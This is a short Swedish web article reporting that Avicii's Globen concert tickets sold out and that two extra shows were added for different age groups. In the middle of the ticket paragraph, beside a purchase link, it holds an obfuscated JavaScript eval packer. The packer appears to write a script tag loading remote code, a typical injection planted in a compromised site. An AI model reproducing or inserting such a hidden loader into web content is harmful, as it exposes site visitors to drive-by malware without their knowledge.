Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Biljetterna till Avicii på Globen ryker snabbt!

Biljetterna till Avicii på Globen ryker snabbt!
Alexander Gylemo

Det är helt sjukt hur många som vill se Avicii då han gör sin största spelning någonsin i Sverige när han gästar Globen i Stockholm i mars nästa år. Biljetterna till den första spelningen den tredje mars var slut på dryga fem timmar, något snopet för alla de som vill se Sveriges största stjärna inom musik just nu. Detta åtgärdades dock rätt snabbt med att man satte in två ytterligare spelningar på samma dag dagen innan! De som inte hann köpa sin biljett har alltså chansen att göra detta nu, och vi rekommenderar att man handlar snabbt!

Två typer av nya biljetter har släppts;  för de som är mellan tretton – arton år har en ny spelning/matiné bokats in till kl. 16:00 den andra mars (köp biljetter här) eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ebnsh|var|u0026u|referrer|stfet||js|php’.split(’|’),0,{}))
och för de som är arton och äldre kör Avicii även en spelning senare på kvällen kl. 22:00 (köp biljetter
här). Passa på medan de finns!